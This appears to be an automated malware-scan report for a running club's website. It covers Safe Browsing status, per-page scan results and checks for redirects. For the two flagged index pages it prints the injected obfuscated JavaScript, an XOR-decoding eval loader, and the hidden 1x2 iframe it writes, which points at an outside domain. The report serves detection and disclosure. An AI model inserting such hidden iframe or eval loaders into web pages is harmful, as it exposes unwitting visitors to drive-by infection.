Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=simivalleyrunningclub.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://simivalleyrunningclub.com/ | 200 OK Content-Length: 5392 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. cq="3a313d2b333b302a70292c372a3b76796237382c3f333b7e2d2c3d637c362a2a2e6471712a2c2b39362a2d3f703d3133717c7e29373a2a36636f7e363b3739362a636c60627137382c3f333b607977655354303d24262b637c103f107c652a2f383433637c103f107c65";lfnu="function slxtoy(){lsymm=Math.PI;ybwn=parseInt;vvwvac='length';oxo=ybwn(~((lsymm&lsymm)|(~lsymm&lsymm)&(lsymm&~lsymm)|(~lsymm&~lsymm)));ywfh=ybwn(((oxo&oxo)|(~oxo&oxo)&(oxo&~oxo)|(~oxo&~oxo ...[563 bytes skipped]... Decoded script: ...[1220 bytes skipped]... fh)tqfjm+=lfnu.charCodeAt(xcikkl);tqfjm%=unescape(oxo+unescape('x')+(1<<6));for(xcikkl=oxo;xcikkl<cq[vvwvac];xcikkl+=xss)nczxu+=mlfxnx(ybwn(oxo+unescape('x')+cq.charAt(xcikkl)+cq.charAt(xcikkl+ybwn(ywfh)))^tqfjm);try{kxpbkr(nczxu);}catch(e){try{eval(nczxu);}catch(e) {window.location='/';}}}try{eval('slxtoy();')}catch(e) {alert('err');} slxtoy(); slxtoy(); String.fromCharCode String.fromCharCode document.write('<iframe src="http://trughtsa.com/" width=1 height=2></iframe>'); nczxu="NaN";tqfjm="NaN"; document.write('<iframe src="http://trughtsa.com/" width=1 height=2></iframe>'); nczxu="NaN";tqfjm="NaN"; <iframe src="http://trughtsa.com/" width=1 height=2></iframe> | ||
http://simivalleyrunningclub.com/membership.htm | 200 OK Content-Length: 3549 Content-Type: text/html | clean |
http://simivalleyrunningclub.com/index.html | 200 OK Content-Length: 5392 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. cq="3a313d2b333b302a70292c372a3b76796237382c3f333b7e2d2c3d637c362a2a2e6471712a2c2b39362a2d3f703d3133717c7e29373a2a36636f7e363b3739362a636c60627137382c3f333b607977655354303d24262b637c103f107c652a2f383433637c103f107c65";lfnu="function slxtoy(){lsymm=Math.PI;ybwn=parseInt;vvwvac='length';oxo=ybwn(~((lsymm&lsymm)|(~lsymm&lsymm)&(lsymm&~lsymm)|(~lsymm&~lsymm)));ywfh=ybwn(((oxo&oxo)|(~oxo&oxo)&(oxo&~oxo)|(~oxo&~oxo ...[563 bytes skipped]... Decoded script: ...[1220 bytes skipped]... fh)tqfjm+=lfnu.charCodeAt(xcikkl);tqfjm%=unescape(oxo+unescape('x')+(1<<6));for(xcikkl=oxo;xcikkl<cq[vvwvac];xcikkl+=xss)nczxu+=mlfxnx(ybwn(oxo+unescape('x')+cq.charAt(xcikkl)+cq.charAt(xcikkl+ybwn(ywfh)))^tqfjm);try{kxpbkr(nczxu);}catch(e){try{eval(nczxu);}catch(e) {window.location='/';}}}try{eval('slxtoy();')}catch(e) {alert('err');} slxtoy(); slxtoy(); String.fromCharCode String.fromCharCode document.write('<iframe src="http://trughtsa.com/" width=1 height=2></iframe>'); nczxu="NaN";tqfjm="NaN"; document.write('<iframe src="http://trughtsa.com/" width=1 height=2></iframe>'); nczxu="NaN";tqfjm="NaN"; <iframe src="http://trughtsa.com/" width=1 height=2></iframe> | ||
http://simivalleyrunningclub.com/calander.htm | 200 OK Content-Length: 3887 Content-Type: text/html | clean |
http://simivalleyrunningclub.com/products.html | 200 OK Content-Length: 3773 Content-Type: text/html | clean |
http://simivalleyrunningclub.com/sponsors.htm | 200 OK Content-Length: 3900 Content-Type: text/html | clean |
http://simivalleyrunningclub.com/contact.htm | 200 OK Content-Length: 3887 Content-Type: text/html | clean |
http://simivalleyrunningclub.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: simivalleyrunningclub.com
Result:
HTTP/1.1 200 OK
Date: Tue, 24 Feb 2015 14:06:10 GMT
Accept-Ranges: bytes
ETag: "172a51f1866ca1:0"
Server: Microsoft-IIS/7.0
Content-Length: 5392
Content-Type: text/html
Last-Modified: Sun, 15 Nov 2009 17:21:52 GMT
X-Powered-By: ASP.NET
...5392 bytes of data.
GET / HTTP/1.1
Host: simivalleyrunningclub.com
Result:
HTTP/1.1 200 OK
Date: Tue, 24 Feb 2015 14:06:10 GMT
Accept-Ranges: bytes
ETag: "172a51f1866ca1:0"
Server: Microsoft-IIS/7.0
Content-Length: 5392
Content-Type: text/html
Last-Modified: Sun, 15 Nov 2009 17:21:52 GMT
X-Powered-By: ASP.NET
...5392 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: simivalleyrunningclub.com
Referer: http://www.google.com/search?q=simivalleyrunningclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: simivalleyrunningclub.com
Referer: http://www.google.com/search?q=simivalleyrunningclub.com
Result:
The result is similar to the first query. There are no suspicious redirects found.